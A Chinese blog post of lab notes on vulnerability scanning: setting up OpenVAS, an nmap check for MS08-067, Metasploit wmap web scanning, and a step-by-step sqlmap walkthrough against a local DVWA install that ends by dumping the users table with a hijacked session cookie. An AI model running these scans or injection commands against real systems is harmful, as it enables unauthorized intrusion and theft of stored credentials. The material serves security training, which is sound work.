网络漏洞扫描

最新推荐文章于 2023-09-07 10:42:33 发布
最新推荐文章于 2023-09-07 10:42:33 发布
阅读量690 收藏
点赞数
分类专栏: hack
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u012319493/article/details/78885716
版权

OpenVAS漏洞扫描器

安装OpenVAS

apt-get install openvas

安装配置OpenVAS

openvas-setup

接下来参考
https://www.cnblogs.com/zlslch/p/6872559.html

Metasploit内部使用OpenVAS

查找特定服务漏洞

使用Nmap查找MS08-067漏洞

nmap -P0 --script=smb-vuln-ms08-067.nse 10.10.10.130

基于Metasploit框架的Web应用渗透技术

// 初始化wmap
db_connect -y /opt/metasploit-4.14.0/config/database.yml
load wmap
help
wmap_sites -a http://202.112.50.74

// 使用wmap进行扫描
wmap_targets -a http://202.112.50.74
wmap_sites -l
wmap_targets -t http://202.112.50.74
wmap_run -t

// 查看wmap扫描结果
wmap_run -e
vluns

sqlmap

安装xampp:https://jingyan.baidu.com/article/adc815138ad0eff723bf7335.html
安装DVWA:https://jingyan.baidu.com/article/0eb457e53b72a003f1a90536.html
出错解决:
http://blog.csdn.net/XavierDarkness/article/details/75040716
http://blog.csdn.net/XavierDarkness/article/details/75041872
tamper data安装与使用:http://blog.csdn.net/yu422560654/article/details/7827421

Sql注入漏洞

接下来主要参考
http://blog.csdn.net/youb11/article/details/45719423

在输入框中随便输入数据,提交后,可以在Tamper data中看到Cookie等数据
这里写图片描述

因为sqlmap扫描要重定向要认证页面,所以需要当前会话cookie,才能在此页面上继续扫描

注入攻击

sqlmap -u 'http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=a5043849f83a11b0926cb0a1a3a0fc0e#' --cookie='security=low; PHPSESSID=a69f819fc79c2b2ecea49bc70706567d'

获得数据库名

sqlmap -u 'http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=a5043849f83a11b0926cb0a1a3a0fc0e#' --cookie='security=low; PHPSESSID=a69f819fc79c2b2ecea49bc70706567d' --dbs

获取数据库dvwa的表名

sqlmap -u 'http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=a5043849f83a11b0926cb0a1a3a0fc0e#' --cookie='security=low; PHPSESSID=a69f819fc79c2b2ecea49bc70706567d' -D dvwa --tables

获取数据库dvwa表users的列名

sqlmap -u 'http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=a5043849f83a11b0926cb0a1a3a0fc0e#' --cookie='security=low; PHPSESSID=a69f819fc79c2b2ecea49bc70706567d' -D dvwa --tables -T users --column

获取字段内容

sqlmap -u 'http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=a5043849f83a11b0926cb0a1a3a0fc0e#' --cookie='security=low; PHPSESSID=a69f819fc79c2b2ecea49bc70706567d' -D dvwa --tables -T users --column --dump

参考
《Metasploit 魔鬼训练营》
https://www.cnblogs.com/justforfun12/p/5209502.html
http://blog.csdn.net/youb11/article/details/45719423

谛听-
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络漏洞扫描技术PPT课件
07-07
网络漏洞扫描技术,网络漏洞扫描技术课件,网络漏洞扫描技术PPT
攻击篇--网络扫描(三)漏洞扫描
qq_40424448的博客
04-21 4079
CVE 如果将每个人写的漏洞模块集中在一起,可以提高工作的效率。在这种情况下,出现了一个可以为大家所接受的漏洞行业标准,通用漏洞披露(CVE)是一本字典,为广泛认同的信息安全漏洞或者已经暴露出来的弱点起了一个公共的名称,在CVE的官方界面上,可以查看到这个名称。国内比较知名的seebug漏洞信息库就是用了CVE标准。 操作系统漏洞扫描 NMAP nmap中带有NSE功能,允许nmap的用户通过脚本实现自定义功能,现在正式的NSE已经包括了超过14个大类的脚本,总数超过500个。这些脚本由各个使用者编
最受渗透测试工程师欢迎的10款漏洞扫描工具(2023版)
m0_70486148的博客
06-26 1909
漏洞扫描工具是现代企业开展渗透测试服务中必不可少的工具之一,可以帮助渗透测试工程师快速发现被测应用程序、操作系统、计算设备和网络系统中存在的安全风险与漏洞,并根据这些漏洞的危害提出修复建议。常见的漏洞扫描工具包括漏洞发现扫描、全功能扫描和合规性扫描。在实际工作中,渗透测试工程师往往根据测试项目的需要,使用多个漏洞扫描工具来完成任务。日前,国外安全媒体Gbhackers根据对数十位安全渗透测试工程师的问卷调研和应用访谈,收集整理出2023年最受安全工程师们欢迎的10款漏洞扫描工具。工具名称主要特点。
网络漏洞扫描的原理和相关程序
diaomiezuo8055的博客
06-08 1413
 1 引言   网络扫描,是基于Internet的、探测远端网络或主机信息的一种技术,也是保证系统和网络安全必不可少的一种手段。主机扫描,是指对计算机主机或者其它网络设备进行安全性检测,以找出安全隐患和系统漏洞。总体而言,网络扫描和主机扫描都可归入漏洞扫描一类。漏洞扫描本质上是一把双刃剑:黑客利用它来寻找对网络或系统发起攻击的途径,而系统管理员则利用它来有效防范黑客入侵。通过漏洞扫描,...
网络安全必备的五款免费网络漏洞扫描
2301_76161259的博客
04-10 3445
尽管我们在电子设备上安装了安全软件,但这些安全软件并不能自主跟踪并捕获所有漏洞。这时候,我们就需要额外安装网络漏洞扫描器,它可以帮助您自动执行安全审查,在IT安全中发挥重要作用。在扫描网络和网站时,网络漏洞扫描器能够查找成千上万的不同安全风险,并生成优先级列表,列出要修补的漏洞,描述漏洞,给出如何补救漏洞的步骤,甚至能够自动化修补漏洞。市面上的漏洞扫描器和安全审查工具价格较高,不适合个人使用者和资金不足的初创公司,但也有免费的漏洞扫描工具。
网络安全入门小白之漏洞扫描工具
m0_58477260的博客
09-07 197
明确您的需求和目标,了解您希望从网络漏洞扫描工具中获得什么。考虑您的网络规模、安全级别要求、预算限制等因素。
详解常见漏洞扫描器及网络扫描技术(图)
热门推荐
zacklin的专栏
03-29 1万+
随着互联网的飞速发展,网络安全逐渐成为一个潜在的巨大问题,如何保障自身网络的安全,其中一个主要的方法就是自查自纠,而在这个过程中,对自己的网络进行扫描成为一种较为快捷、直观、简单的方法。扫描技术基于TCP/IP协议,对各种网络服务,无论是主机或者防火墙、路由器都适用。同时, 扫描可以确认各种配置的正确性,避免遭受不必要的攻击。网络扫描是一把双刃剑,对于安全管理员来说,可以用来确保自己系统的安全性,
网络安全-漏洞扫描
qq_37776764的博客
06-27 855
漏洞扫描概念、漏洞扫描试验内容、漏洞扫描分类
浅谈网络安全渗透测试与漏洞扫描
Y525698136的博客
06-09 530
上半年的陆陆续续的网路安全事件都结束了,来到了下半年的时间又要重新开始远程。最近有趣的是我一个朋友前几天去面试的时候,技术面试的时候被一个简单的问题直接给刷下来了,渗透测试与漏洞扫描有什么区别?
常见网络安全设备:漏洞扫描设备
qq_53058639的博客
03-13 1150
没学过的同学也不要慌,可以去B站搜索相关视频,你搜关键词网络安全工程师出现很多相关的视频教程,我粗略的看了一下,排名第一的视频就讲的很详细。想学好Web安全,咱首先得先弄清web是怎么搭建的,知道它的构造才能精准打击。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机才越多。是指基于漏洞数据库,通过扫描等手段对指定的远程或者本地计算机系统的安全脆弱性进行检测,发现可利用的漏洞的一种安全检测(渗透攻击)行为。
网络安全和漏洞扫描器源码
07-31
多线程的网络扫描器源码 不错的学习工具。
信息安全技术 网络脆弱性扫描产品技术要求
12-16
信息安全技术 网络脆弱性扫描产品技术要求
网络脆弱性扫描技术要求
09-27
网络脆弱性扫描技术要求网络脆弱性扫描技术要求网络脆弱性扫描技术要求
网络漏洞扫描
05-08
网络漏洞扫描器,可扫描端口然后进一步分析漏洞并且分析目标主机的操作系统和服务开放。
网络漏洞扫描工具
02-28
扫描器并不是一个直接的攻击网络漏洞的程序,它仅仅能帮助我们发现目标机的某些存在的弱点。一个好的扫描器能对它得到的数据进行分析,帮助我们查找目标主机的漏洞。但它不提供进入一个系统的详细步骤。 扫描器...
网络安全-漏洞扫描.ppt
05-25
1 计算机漏洞 2 实施网络扫描 3 常用的网络扫描工具 4 不同的扫描策略
利用流式套接字传输数据文件
新博客:https://aping-dev.com/
12-18 4774
服务器端: 1>建立一个基于对话框的应用程序StreamSocketServer 2>设计界面,将“确定”按钮的标题改为“启动” 3>双击“启动按钮”,添加以下代码,初始化网络,启动服务器监听void CStreamSocketServerDlg::OnOK() { // TODO: Add extra validation here WSADATA wsaData;
vbox kali安装linux-headers
新博客:https://aping-dev.com/
12-24 3389
打开sources.listvim /etc/apt/sources.list添加官方源deb http://http.kali.org/kali kali-rolling main non-free contrib deb-src http://http.kali.org/kali kali-rolling main non-free contrib 更新apt-get update apt-ge
创建TCP代理
新博客:https://aping-dev.com/
01-16 2263
TCP代理可以将流量从一个主机转发给另一个主机,还可以起到类似Wireshark的作用,了解未知的协议,修改发送到应用的数据包。 main 读入命令行,解析,调用server_loop监听连接请求,当一个新的请求到达时,交给proxy_handler处理。 proxy_handler: 每接收1 bit数据,发送到目标远程主机。持续从本地读取数据、处理、发送到远程主机,从远程读取数据、处理、
基于python的网络漏洞扫描系统代码下载
最新发布
11-26
基于Python的网络漏洞扫描系统代码通常可以通过GitHub等开源代码托管平台进行下载。用户只需在搜索框中输入相关关键词,如“Python网络漏洞扫描系统代码”,即可找到相关的开源项目。一般来说,项目的README文件或者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值